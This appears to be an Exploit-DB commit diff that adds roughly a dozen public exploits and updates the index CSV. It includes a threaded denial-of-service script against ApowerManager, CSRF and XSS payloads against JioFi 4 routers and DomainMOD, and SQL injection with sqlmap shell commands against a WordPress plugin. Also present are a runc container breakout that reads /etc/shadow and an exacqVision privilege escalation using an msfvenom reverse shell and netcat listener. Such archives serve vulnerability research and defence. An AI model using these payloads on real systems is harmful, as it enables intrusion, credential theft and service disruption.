DB: 2019-02-15

18 changes to exploits/shellcodes Core FTP/SFTP Server 1.2 Build 589.42 - 'User domain' Denial of Service (PoC) MediaMonkey 4.1.23 - '.mp3' URL Denial of Service (PoC) ApowerManager 3.1.7 - Phone Manager Remote Denial of Service (DoS) runc < 1.0-rc6 (Docker < 18.09.2) - Host Command Execution runc < 1.0-rc6 (Docker < 18.09.2) - Container Breakout (1) exacqVision ESM 5.12.2 - Privilege Escalation runc < 1.0-rc6 (Docker < 18.09.2) - Container Breakout (2) Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - Reflected Cross-Site Scripting Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - Cross-Site Request Forgery (Password Disclosure) Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - Cross-Site Request Forgery (Admin Token Disclosure) DomainMOD 4.11.01 - 'ssl-provider-name' Cross-Site Scripting DomainMOD 4.11.01 - 'ssl-accounts.php username' Cross-Site Scripting DomainMOD 4.11.01 - 'category.php CatagoryName_ StakeHolder' Cross-Site Scripting DomainMOD 4.11.01 - 'assets/add/dns.php' Cross-Site Scripting DomainMOD 4.11.01 - 'assets/edit/host.php?whid=5' Cross-Site Scripting WordPress Plugin Booking Calendar 8.4.3 - Authenticated SQL Injection LayerBB 1.1.2 - Cross-Site Request Forgery (Add Admin)
2019-02-15 05:01:54 +00:00 · 2019-02-15 05:01:54 +00:00 · 5f3f5c8f09
commit 5f3f5c8f09
parent a4b18dada5
16 changed files with 441 additions and 168 deletions
--- a/exploits/android/dos/46380.py
+++ b/exploits/android/dos/46380.py
@ -0,0 +1,49 @@
 #!/usr/bin/python
 #coding: utf-8
 # *********************************************************************
 # *             Author: Marcelo Vázquez (aka s4vitar)                 *
 # *  ApowerManager Remote Denial of Service (DoS) / Application Crash *
 # *********************************************************************
 # Exploit Title: ApowerManager - Phone Manager Remote Denial of Service (DoS) / Application Crash
 # Date: 2019-02-14
 # Exploit Author: Marcelo Vázquez (aka s4vitar)
 # Vendor Homepage: https://www.apowersoft.com/phone-manager
 # Software Link: https://www.apkmonk.com/download-app/com.apowersoft.phone.manager/4_com.apowersoft.phone.manager_2019-01-08.apk/
 # Version: <= ApowerManager - Phone Manager 3.1.7
 # Tested on: Android
 import sys, requests, threading, signal
 def handler(signum, frame):
        print '\nFinishing program...\n'
        sys.exit(0)
 if len(sys.argv) != 3:
 	print "\nUsage: python " + sys.argv[0] + " <ip_address> <port>\n"
 	print "Example: python apowermanager_dos.py 192.168.1.125 2333\n"
 	sys.exit(0)
 def startAttack(url):
 	url_destination = url + '/?Key=PhoneRequestAuthorization'
 	headers = {'Origin': url, 'Accept-Encoding': 'gzip, deflate, br', 'Accept-Language': 'es-ES,es;q=0.9,en;q=0.8', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36', 'Content-Type': 'text/plain;charset=UTF-8', 'accept': 'text/plain', 'Referer': url, 'Connection': 'keep-alive'}
 	r = requests.post(url_destination, headers=headers)
 if __name__ == '__main__':
 	signal.signal(signal.SIGINT, handler)
 	url = 'http://' + sys.argv[1] + ':' + sys.argv[2]
 	threads = []
 	for i in xrange(0, 10000):
 		t = threading.Thread(target=startAttack, args=(url,))
 		threads.append(t)
 	for x in threads:
 		x.start()
 	for x in threads:
 		x.join()
--- a/exploits/hardware/webapps/46363.txt
+++ b/exploits/hardware/webapps/46363.txt
@ -1,33 +0,0 @@
 # Exploit Title: Jiofi 4 (JMR 1140) Reflected Cross Site Scripting
 # Date: 12.02.2019
 # Exploit Author: Ronnie T Baby
 # Contact:https://www.linkedin.com/in/ronnietbaby
 # Vendor Homepage: www.jio.com
 # Hardware Link: https://www.jio.com/shop/en-in/jmr-1140/p/491193574
 # Category: Hardware (Wifi Router)
 # Version: JMR-1140 Firmware v. Amtel_JMR1140_R12.07
 # Tested on: Ubuntu 18.04
 # CVE: CVE-2019-7687
 Description:
 cgi-bin/qcmap_web_cgi on  JioFi 4 jmr1140 Amtel_JMR1140_R12.07 devices  has POST based reflected XSS via the Page parameter. No sanitization is performed for user input data.
 1. Create a poc.html and insert
 <html>
   <body>
   <script>history.pushState('', '', '/')</script>
     <form action="http://jiofi.local.html/cgi-bin/qcmap_web_cgi" method="POST">
      <input type="hidden" name="Page" value="GetDeviceDetailsyfc7b<script>alert&#40;document.domain&#41;<&#47;script>pyk0j" />
      <input type="hidden" name="mask" value="0" />
     <input type="hidden" name="token" value="0" />
     <input type="submit" value="Submit request" />
    </form>
   </body>d
 </html>
 2. Send to victim(who is connected to the wifi network).
 3. Post based Xss gets fired .
 Exploit working in firefox quantum ,firefox dev edition etc. Chrome XSS auditor blocks this POC.
--- a/exploits/hardware/webapps/46364.txt
+++ b/exploits/hardware/webapps/46364.txt
@ -1,41 +0,0 @@
 # Exploit Title: Jiofi 4 (JMR 1140) CSRF To View Wi-fi Password
 # Date: 12.02.2019
 # Exploit Author: Ronnie T Baby
 # Contact:https://www.linkedin.com/in/ronnietbaby
 # Vendor Homepage: www.jio.com
 # Hardware Link: https://www.jio.com/shop/en-in/jmr-1140/p/491193574
 # Category: Hardware (Wifi Router)
 # Version: JMR-1140 Firmware v. Amtel_JMR1140_R12.07
 # Tested on: Ubuntu 18.04
 # CVE: CVE-2019-7745
 Description:
 JioFi 4 jmr1140 Amtel_JMR1140_R12.07 devices allow remote attackers to obtain the Wi-Fi password by making a cgi-in/qcmap_web_cgi Page=GetWiFi_Setting request and then reading the wpa_security_key field.
 POC-
 1. Create a view.html and insert
 <html>
   <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://jiofi.local.html/cgi-bin/qcmap_web_cgi" method="POST">
      <input type="hidden" name="Page" value="GetWiFi&#95;Setting" />
      <input type="hidden" name="Mask" value="0" />
      <input type="hidden" name="result" value="0" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
 </html>
 2. Send to victim(who is connected to the wifi network).
 3. The response gives the current wifi password.
  Example response-
 {"Page":"GetWiFi_Setting","Mask":"0","result":"SUCCESS","ssid":"JioFi4_08FE5F","mode_802_11":"11bgn","tx_power":"MID",
 "wmm":"Enable","wps_enable":"PushButton","wifi_security":"WPA2PSK","wpa_encryption_type":"AES",
 "wpa_security_key":"leakedpassword",".....etc}
 Note- I believe this to work in all other jio routers viz. Jio JMR 540, Jiofi M2 as all share similar web interface. I have not confirmed this.
--- a/exploits/hardware/webapps/46365.txt
+++ b/exploits/hardware/webapps/46365.txt
@ -1,90 +0,0 @@
 # Exploit Title: Jiofi 4 (JMR 1140) CSRF To Leak Admin Tokens to change wifi Password or Factory Reset Router	
 # Date: 12.02.2019
 # Exploit Author: Ronnie T Baby
 # Contact:https://www.linkedin.com/in/ronnietbaby
 # Vendor Homepage: www.jio.com
 # Hardware Link: https://www.jio.com/shop/en-in/jmr-1140/p/491193574
 # Category: Hardware (Wifi Router)
 # Version: JMR-1140 Firmware v. Amtel_JMR1140_R12.07
 # Tested on: Ubuntu 18.04
 # CVE: CVE-2019-7746
 Description:
 JioFi 4 jmr1140 Amtel_JMR1140_R12.07 devices allow remote attackers to obtain an admin token by making a  /cgi-bin/qcmap_auth type=getuser request and then reading the token  field. This token value can then be used to change the Wi-Fi password or perform a factory reset.
 POC-
 The exploit requires two csrf requests to be sent to the victim(logged to  the web interface) connected to the Jiofi router.
 1. First get admin tokens 
 <html>
    <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://jiofi.local.html/cgi-bin/qcmap_auth" method="POST">
      <input type="hidden" name="type" value="getuser" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
 </html>
  Example response-
 {"super_user_id":"administrator", "oper_user_id":"operator", "end_user_id":"admin", "token":"leakedtokens"}
 Choice A)Change wifi password to attacker's choice of the Jiofi 4(JMR 1140) router.
 <html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://jiofi.local.html/cgi-bin/qcmap_web_cgi" method="POST">
      <input type="hidden" name="Page" value="SetWiFi&#95;Setting" />
      <input type="hidden" name="Mask" value="0" />
      <input type="hidden" name="result" value="0" />
      <input type="hidden" name="ssid" value="JioFi4&#95;08FE5F" />
      <input type="hidden" name="mode&#95;802&#95;11" value="11bgn" />
      <input type="hidden" name="tx&#95;power" value="HIGH" />
      <input type="hidden" name="wmm" value="Enable" />
      <input type="hidden" name="wps&#95;enable" value="PushButton" />
      <input type="hidden" name="wifi&#95;security" value="WPA2PSK" />
      <input type="hidden" name="wpa&#95;encryption&#95;type" value="AES" />
      <input type="hidden" name="wpa&#95;security&#95;key" value="Iamhacked" />
      <input type="hidden" name="wep&#95;security&#95;key&#95;1" value="0" />
      <input type="hidden" name="wep&#95;security&#95;key&#95;2" value="0" />
      <input type="hidden" name="wep&#95;security&#95;key&#95;3" value="0" />
      <input type="hidden" name="wep&#95;security&#95;key&#95;4" value="0" />
      <input type="hidden" name="wep&#95;current&#95;default&#95;key" value="0" />
      <input type="hidden" name="channel&#95;mode" value="automatic" />
      <input type="hidden" name="channel&#95;selection" value="11" />
      <input type="hidden" name="sleep&#95;mode" value="Enable" />
      <input type="hidden" name="sleep&#95;mode&#95;timer" value="30" />
      <input type="hidden" name="ssid&#95;broadcast" value="Enable" />
      <input type="hidden" name="enable&#95;wifi" value="Enable" />
      <input type="hidden" name="token" value="leakedtokens" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
 </html>
 Wifi Password changed to Iamhacked
 Choice B) Perform Remote Factory Reset
 <html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://jiofi.local.html/cgi-bin/qcmap_web_cgi" method="POST">
      <input type="hidden" name="type" value="FRST&#95;REAL" />
      <input type="hidden" name="token" value="leakedtokens" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
 </html>
 The router reboots to default settings.
 Note- I believe this to work in all other jio routers viz. Jio JMR 540, Jiofi M2 as all share similar web interface. I have not confirmed this.
--- a/exploits/linux/local/46369.md
+++ b/exploits/linux/local/46369.md
@ -0,0 +1,81 @@
 ## CVE-2019-5736 ##
 This is exploit code for CVE-2019-5736 (and it works for both runc and LXC).
 The simplest way to use it is to copy the exploit code into an existing
 container, and run `make.sh`. However, you could just as easily create a bad
 image and run that.
 ```console
 % docker run --rm --name pwnme -dit ubuntu:18.10 bash
 pwnme
 % docker cp CVE-2019-5736.tar pwnme:/CVE-2019-5736.tar
 ```
 We need to install `gcc` to build the exploit, and `runc` because we need to
 have the shared libraries that `runc` would use. We don't actually use the
 `runc` binary itself. For LXC, you would install `lxc` instead of `runc`.
 ```console
 % docker attach pwnme
 # apt-get update && apt-get install -y gcc runc
 [ snip ]
 # tar xf CVE-2019-5736.tar
 # ./CVE-2019-5736/make.sh
 ```
 And now, `/bin/bash` in the container will be able to **overwrite the host runc
 binary**. Since this binary is often executed by `root`, this allows for
 root-level code execution on the host.
 ```
 % docker exec -it pwnme /bin/bash
 [+] bad_libseccomp.so booted.
 [+] opened ro /proc/self/exe <3>.
 [+] constructed fdpath </proc/self/fd/3>
 [+] bad_init is ready -- see </tmp/bad_init_log> for logs.
 [*] dying to allow /proc/self/exe to be unused...
 % cat /usr/sbin/docker-runc
 #!/bin/bash
 touch /w00t_w00t ; cat /etc/shadow
 ```
 And now if you try to use Docker normally, the malicious script will execute
 with root privileges:
 ```
 % docker exec -it pwnme /bin/good_bash
 OCI runtime state failed: invalid character 'b' looking for beginning of value: unknown
 % file /w00t_w00t
 /w00t_w00t: empty
 ```
 And obviously `make.sh` can be modified to make the evil path anything you
 like. If you want to get access to the container, use `/bin/good_bash`.
 ### License ###
 ```
 Copyright (C) 2019 Aleksa Sarai <cyphar@cyphar.com>
 Vulnerability discovered by Adam Iwaniuk and Borys Popławski.
 Permission is hereby granted, free of charge, to any person obtaining a copy
 of this software and associated documentation files (the "Software"), to
 deal in the Software without restriction, including without limitation the
 rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
 sell copies of the Software, and to permit persons to whom the Software is
 furnished to do so, subject to the following conditions:
 * The above copyright notice and this permission notice shall be included in
  all copies or substantial portions of the Software.
 THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
 IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
 FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
 AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
 LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
 FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
 IN THE SOFTWARE.
 ```
 Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46369.zip
--- a/exploits/php/webapps/46372.txt
+++ b/exploits/php/webapps/46372.txt
@ -0,0 +1,16 @@
 # Exploit Title: DomainMOD 4.11.01 - Cross-Site Scripting
 # Date: 2018-11-22
 # Exploit Author: Mohammed Abdul Raheem
 # Vendor Homepage: domainmod (https://domainmod.org/)
 # Software Link: domainmod (https://github.com/DomainMod/DomainMod)
 # Version: v4.09.03 to v4.11.01
 # CVE : CVE-2018-20009
 # A Stored Cross-site scripting (XSS) was discovered in DomainMod application
 # versions from v4.09.03 to v4.11.01
 # After logging into the Domainmod application panel, browse to the
 /assets/add/ssl-provider.php page and inject a javascript XSS payload
 in ssl-provider-name, ssl-provider's-url "><img src=x
 onerror=alert("Xss-By-Abdul-Raheem")>
 #POC : attached here https://github.com/domainmod/domainmod/issues/88
--- a/exploits/php/webapps/46373.txt
+++ b/exploits/php/webapps/46373.txt
@ -0,0 +1,16 @@
 # Exploit Title: DomainMOD 4.11.01 - Cross-Site Scripting
 # Date: 2018-11-22
 # Exploit Author: Mohammed Abdul Raheem
 # Vendor Homepage: domainmod (https://domainmod.org/)
 # Software Link: domainmod (https://github.com/DomainMod/DomainMod)
 # Version: v4.09.03 to v4.11.01
 # CVE : CVE-2018-20010
 # A Stored Cross-site scripting (XSS) was discovered in DomainMod application
 # versions from v4.09.03 to v4.11.01
 # After logging into the Domainmod application panel, browse to the
 /assets/add/ssl-provider-account.php page and inject a javascript XSS
 payload in username field "><img src=x
 onerror=alert("Xss-By-Abdul-Raheem")>
 #POC : attached here https://github.com/domainmod/domainmod/issues/88
--- a/exploits/php/webapps/46374.txt
+++ b/exploits/php/webapps/46374.txt
@ -0,0 +1,16 @@
 # Exploit Title: DomainMOD 4.11.01 - Cross-Site Scripting
 # Date: 2018-11-22
 # Exploit Author: Mohammed Abdul Raheem
 # Vendor Homepage: domainmod (https://domainmod.org/)
 # Software Link: domainmod (https://github.com/DomainMod/DomainMod)
 # Version: v4.09.03 to v4.11.01
 # CVE : CVE-2018-20011
 # A Stored Cross-site scripting (XSS) was discovered in DomainMod application
 # versions from v4.09.03 to v4.11.01
 # After logging into the Domainmod application panel, browse to the
 /assets/add/category.php page and inject a javascript XSS payload in
 CatagoryName, StakeHolder fields "><img src=x
 onerror=alert("Xss-By-Abdul-Raheem")>
 #POC : attached here https://github.com/domainmod/domainmod/issues/88
--- a/exploits/php/webapps/46375.txt
+++ b/exploits/php/webapps/46375.txt
@ -0,0 +1,14 @@
 # Exploit Title: DomainMOD 4.11.01 - Cross-Site Scripting
 # Date: 2018-11-22
 # Exploit Author: Mohammed Abdul Raheem
 # Vendor Homepage: domainmod (https://domainmod.org/)
 # Software Link: domainmod (https://github.com/DomainMod/DomainMod)
 # Version: v4.09.03 to v4.11.01
 # CVE : CVE-2018-19914
 # A Stored Cross-site scripting (XSS) was discovered in DomainMod application
 # versions from v4.09.03 to v4.11.01
 # After logging into the Domainmod application panel, browse to the
 /assets/add/dns.php page and inject a javascript XSS payload in
 Profile Name & notes fields "><img src=x onerror=alert("XSSed-By-Abdul-Kareem")>
 #POC : attached here https://github.com/domainmod/domainmod/issues/87
--- a/exploits/php/webapps/46376.txt
+++ b/exploits/php/webapps/46376.txt
@ -0,0 +1,15 @@
 # Exploit Title: DomainMOD 4.11.01 - Cross-Site Scripting
 # Date: 2018-11-22
 # Exploit Author: Mohammed Abdul Kareem
 # Vendor Homepage: domainmod (https://domainmod.org/)
 # Software Link: domainmod (https://github.com/DomainMod/DomainMod)
 # Version: v4.09.03 to v4.11.01
 # CVE : CVE-2018-19915
 # A Stored Cross-site scripting (XSS) was discovered in DomainMod application
 # versions from v4.09.03 to v4.11.01
 # After logging into the Domainmod application panel, browse to the
 /assets/edit/host.php?whid=5 page and inject a javascript XSS payload
 in "Web Host Name" & "Web Host's url fields "><img src=x
 onerror=alert("XSSed-By-Abdul-Kareem")>
 #POC : attached here https://github.com/domainmod/domainmod/issues/87
--- a/exploits/php/webapps/46377.txt
+++ b/exploits/php/webapps/46377.txt
@ -0,0 +1,58 @@
 # Exploit Title: Wordpress Booking Calendar v8.4.3 - Authenticated SQL Injection Vulnerability
 # Date: 2018-12-28
 # Exploit Author: B0UG
 # Vendor Homepage: https://wpbookingcalendar.com/
 # Software Link: https://wordpress.org/plugins/booking/
 # Version: Tested on version 8.4.3 (older versions may also be affected)
 # Tested on: WordPress
 # Category : Webapps
 # CVE: CVE-2018-20556
 #I. VULNERABILITY
 Authenticated SQL Injection
 #II. BACKGROUND
 'Booking Calendar' WordPress plugin developed by oplugins is a booking system which allows website visitors to check the availability of services and make reservations.
 #III. DESCRIPTION
 An authenticated SQL Injection vulnerability in the 'Booking Calendar' WordPress plugin allows an attacker to read arbitrary data from the database. 
 #IV. PROOF OF CONCEPT
 1) Access WordPress control panel.
 2) Navigate to the Booking Calendar plugin page.
 3) Set up Burp Suite to capture the traffic.
 4) Select one of the booking entries and click on the 'Trash Can' button to delete the entry.
 5) Within Burp Suite, analyse the POST request and idenitfy the parameter 'booking_id'.
 6) The 'booking_id' parameter is vulnerable to the following different types of SQL injection: 
 • Boolean based blind injection
 • Error based injection
 • Time based injection
 7) We can perform a time based SQL injection by appending   ) AND SLEEP(100) AND (1=1   after the ID value in the parameter as shown below.
 action=TRASH_RESTORE&booking_id=573) AND SLEEP(100) AND (1=1&is_send_emeils=1&denyreason=&user_id=1&wpdev_active_locale=en_US&is_trash=1&wpbc_nonce=99c5ffaa67
 Obtaining a shell using sqlmap
 -----------------------
 • Obtain a SQL Shell
 Sqlmap –r post-request.txt –p booking_id --sql-shell
 • Obtain a Linux Shell
 Sqlmap –r post-request.txt –p booking_id --os-shell
 • Obtain a Windows Command Prompt
 Sqlmap –r post-request.txt –p booking_id --os-cmd
 #V. IMPACT
 The vulnerability allows an attacker to read arbitrary data from the database. It is possible to get a remote shell from this vulnerability.
 #VI. SYSTEMS AFFECTED
 WordPress websites running 'Booking Calendar' WordPress plugin version 8.4.3 (older versions may also be affected).
 #VII. REMEDIATION
 Uninstall the plugin until the vulnerability has been fixed by the developer.
 #VIII. DISCLOSURE TIMELINE
 #December 28, 2018 1: Vulnerability identified.
 #December 28, 2018 2: Informed developer of the vulnerability.
 #February 14, 2019 3: No communication received back from the developer.
--- a/exploits/php/webapps/46379.txt
+++ b/exploits/php/webapps/46379.txt
@ -0,0 +1,38 @@
 # Exploit Title: LayerBB 1.1.2 - Cross-Site Request Forgery
 # Date: 10/4/2018
 # Author: 0xB9
 # Twitter: @0xB9Sec
 # Contact: 0xB9[at]pm.me
 # Software Link: https://forum.layerbb.com
 # Version: 1.1.2
 # Tested on: Ubuntu 18.04
 # CVE: CVE-2018-17996
 1. Description:
 LayerBB is a free open-source forum software, the CSRF allows creating a admin user.
 2. Proof of Concept:
 <!-- Create Admin User -->  
 <html>
  <body>
 	<form action="http://localhost/[path]/admin/new_user.php" method="POST">
        <label for="username">Username</label>
        <input name="username" id="username" value="test" type="text">
        <label for="password">Password</label>
        <input name="password" id="password" value="password123" type="password">
        <label for="email">Email Address</label>
        <input name="email" id="email" value="test@localhost.co" type="text">               
        <label for="usergroup">Usergroup</label><br>
        <select name="usergroup" id="usergroup" style="width:100%;"><option value="4">Administrator</option></select><br><br>
        <input name="create" value="Create User" type="submit">
    </form>
  </body>
 </html>
 <!-- Create Admin User End -->
 3. Solution:
 Update to 1.1.3
--- a/exploits/windows/dos/46371.py
+++ b/exploits/windows/dos/46371.py
@ -0,0 +1,26 @@
 #Exploit Title: Core FTP/SFTP Server 1.2 - Build 589.42 - Denial of Service (PoC)
 #Discovery by: Victor Mondragón
 #Discovery Date: 2019-02-13
 #Vendor Homepage: http://www.coreftp.com/
 #Software Link: http://www.coreftp.com/server/download/archive/CoreFTPServer589.42.exe
 #Tested Version: v2-Build 673
 #Tested on: Windows 7 Service Pack 1 x32
 #Steps to produce the crash:
 #1.- Run python code: Core_FTP_SFTP_Server_1.2.py
 #2.- Open core_code.txt and copy content to clipboard
 #3.- Open Core FTP Server
 #4.- Select "Setup" > "New"
 #5.- Select "Domain Name" and Put "Test"
 #6.- Select "Domain IP/Address" and Put "1.1.1.1" 
 #7.- Select "Base directory" and Choose a directory path
 #8.- Enable "WinNT users" 
 #9.- Select "User domain" and Paste Clipboard
 #10.- Click on "Ok" and the next window click "Ok"
 #11.- Crashed
 cod = "\x41" * 7000
 f = open('core_code.txt', 'w')
 f.write(cod)
 f.close()
--- a/exploits/windows/dos/46378.py
+++ b/exploits/windows/dos/46378.py
@ -0,0 +1,24 @@
 # -*- coding: utf-8 -*-
 # Exploit Title: MediaMonkey 4.1.23 - URL Denial of Service (PoC)
 # Date: 13/02/2019
 # Author: Alejandra Sánchez
 # Vendor Homepage: https://www.mediamonkey.com/
 # Software Link: https://www.mediamonkey.com/sw/MediaMonkey_4.1.23.1881.exe
 # Version: 4.1.23.1881
 # Tested on: Windows 10
 # Proof of Concept:
 # 1.- Run the python script "MediaMonkey.py", it will create a new file "PoC.mp3"
 # 2.- Open MediaMonkey.exe 
 # 3.- Go to File > Open URL or File...
 # 4.- Click on button -> Browse... and select the 'PoC.mp3' file created
 # 5.- Crashed
 buffer = "http://127.0.0.1/"
 badstr = "\x41" * 4000
 buffer += badstr
 buffer += ".mp3"
 f = open ("PoC.mp3", "w")
 f.write(buffer)
 f.close()
--- a/exploits/windows/local/46370.txt
+++ b/exploits/windows/local/46370.txt
@ -0,0 +1,75 @@
 # Exploit Title:  exacqVision ESM 5.12.2 - Privilege Escalation
 # Exploit Author: bzyo
 # Twitter: @bzyo_
 # Date: 2019-02-13
 # Vulnerable Software: 
 # http://cdnpublic.exacq.com/5.12/exacqVisionEnterpriseSystemManager_5.12.2.150128_x86.exe
 # Vendor Homepage: https://www.exacq.com
 # Version: 5.12.2.150128
 # Tested Windows 7 SP1 x86 and Windows 10 x64
 # Description:
 # exacqVision ESM 5.12.2 suffers from Privilege Escalation due to insecure file permissions
 # Prerequisites
 # Local, Low privilege access with restart capabilities
 # Details
 # By default the Authenticated Users group has the modify permission to ESM folders/files as shown below.  
 # A low privilege account is able to rename the enterprisesystemmanager.exe file located in 
 # this same path and replace with a malicious file that would connect back to an attacking computer giving system level privileges 
 # (nt authority\system) due to the service running as Local System.  While a low privilege user is unable to restart the service 
 # through the application, a restart of the computer triggers the execution of the malicious file.
 # note: during install, you cannot choose a folder containing spaces i.e. "program files"
 C:\>icacls exacqVisionEsm
 exacqVisionEsm NT AUTHORITY\NETWORK SERVICE:(RX)
               win7-32bit\bob:(RX)
               BUILTIN\Administrators:(I)(F)
               BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
               NT AUTHORITY\SYSTEM:(I)(F)
               NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
               BUILTIN\Users:(I)(OI)(CI)(RX)
               NT AUTHORITY\Authenticated Users:(I)(M)
               NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M)
 Successfully processed 1 files; Failed processing 0 files
 C:\>sc qc "exacqVision Enterprise System Manager Web Service"
 [SC] QueryServiceConfig SUCCESS
 SERVICE_NAME: exacqVision Enterprise System Manager Web Service
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\exacqVisionEsm\EnterpriseSystemManager\enterprisesystemmanager.exe"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : ESMWebService
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
 # Proof of Concept
 1. Generate malicious .exe on attacking machine
  msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.163 LPORT=443 -f exe > /var/www/html/enterprisesystemmanager.exe
 2. Setup listener and ensure apache is running on attacking machine
  nc -nlvvp 443
  service apache2 start
 3. Download malicious .exe on victim machine
  Open browser to http://192.168.0.163/enterprisesystemmanager.exe and download
 4. Rename C:\exacqVisionEsm\EnterpriseSystemManager\enterprisesystemmanager.exe
   enterprisesystemmanager.exe > enterprisesystemmanager.bak
 5. Copy/Move downloaded enterprisesystemmanager.exe file to C:\exacqVisionEsm\EnterpriseSystemManager\
 6. Restart victim machine and login as low privileged user 
 7. Reverse Shell on attacking machine opens
 	C:\Windows\system32>whoami
 	whoami
 	nt authority\system
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -6307,6 +6307,9 @@ id,file,description,date,author,type,platform,port
 46357,exploits/android/dos/46357.txt,"Android - binder Use-After-Free of VMA via race Between reclaim and munmap",2019-02-12,"Google Security Research",dos,android,
 46358,exploits/asp/dos/46358.py,"Skyworth GPON HomeGateways and Optical Network Terminals - Stack Overflow",2019-02-12,"Kaustubh G. Padwad",dos,asp,80
 46367,exploits/windows/dos/46367.py,"NetworkSleuth 3.0 - 'Name' Denial of Service (PoC)",2019-02-13,"Alejandra Sánchez",dos,windows,
 46371,exploits/windows/dos/46371.py,"Core FTP/SFTP Server 1.2 Build 589.42 - 'User domain' Denial of Service (PoC)",2019-02-14,"Victor Mondragón",dos,windows,
 46378,exploits/windows/dos/46378.py,"MediaMonkey 4.1.23 - '.mp3' URL Denial of Service (PoC)",2019-02-14,"Alejandra Sánchez",dos,windows,
 46380,exploits/android/dos/46380.py,"ApowerManager 3.1.7 - Phone Manager Remote Denial of Service (DoS)",2019-02-14,s4vitar,dos,android,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -10294,9 +10297,11 @@ id,file,description,date,author,type,platform,port
 46341,exploits/linux/local/46341.rb,"Evince - CBT File Command Injection (Metasploit)",2019-02-11,Metasploit,local,linux,
 46345,exploits/windows/local/46345.py,"Avast Anti-Virus < 19.1.2360 - Local Credentials Disclosure",2019-02-11,"Nathu Nandwani",local,windows,
 46346,exploits/windows/local/46346.py,"River Past Video Cleaner 7.6.3 - Local Buffer Overflow (SEH)",2019-02-11,crash_manucoot,local,windows,
-46359,exploits/linux/local/46359.md,"runc < 1.0-rc6 (Docker < 18.09.2) - Host Command Execution",2019-02-12,feexd,local,linux,
+46359,exploits/linux/local/46359.md,"runc < 1.0-rc6 (Docker < 18.09.2) - Container Breakout (1)",2019-02-12,feexd,local,linux,
 46361,exploits/linux/local/46361.py,"snapd < 2.37 (Ubuntu) - 'dirty_sock' Local Privilege Escalation (1)",2019-02-13,"Chris Moberly",local,linux,
 46362,exploits/linux/local/46362.py,"snapd < 2.37 (Ubuntu) - 'dirty_sock' Local Privilege Escalation (2)",2019-02-13,"Chris Moberly",local,linux,
 46370,exploits/windows/local/46370.txt,"exacqVision ESM 5.12.2 - Privilege Escalation",2019-02-14,bzyo,local,windows,
 46369,exploits/linux/local/46369.md,"runc < 1.0-rc6 (Docker < 18.09.2) - Container Breakout (2)",2019-02-13,embargo,local,linux,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -40819,8 +40824,6 @@ id,file,description,date,author,type,platform,port
 46330,exploits/php/webapps/46330.txt,"osCommerce 2.3.4.1 - 'reviews_id' SQL Injection",2019-02-06,"Mehmet EMIROGLU",webapps,php,80
 46333,exploits/cgi/webapps/46333.txt,"Smoothwall Express 3.1-SP4 - Cross-Site Scripting",2019-02-11,"Ozer Goker",webapps,cgi,
 46336,exploits/hardware/webapps/46336.html,"Coship Wireless Router 4.0.0.x/5.0.0.x - WiFi Password Reset",2019-02-11,"Adithyan AK",webapps,hardware,
 46363,exploits/hardware/webapps/46363.txt,"Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - Reflected Cross-Site Scripting",2019-02-13,"Ronnie T Baby",webapps,hardware,80
 46364,exploits/hardware/webapps/46364.txt,"Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - Cross-Site Request Forgery (Password Disclosure)",2019-02-13,"Ronnie T Baby",webapps,hardware,80
 46344,exploits/cgi/webapps/46344.txt,"IPFire 2.21 - Cross-Site Scripting",2019-02-11,"Ozer Goker",webapps,cgi,443
 46347,exploits/php/webapps/46347.txt,"MyBB Bans List 1.0 - Cross-Site Scripting",2019-02-11,0xB9,webapps,php,80
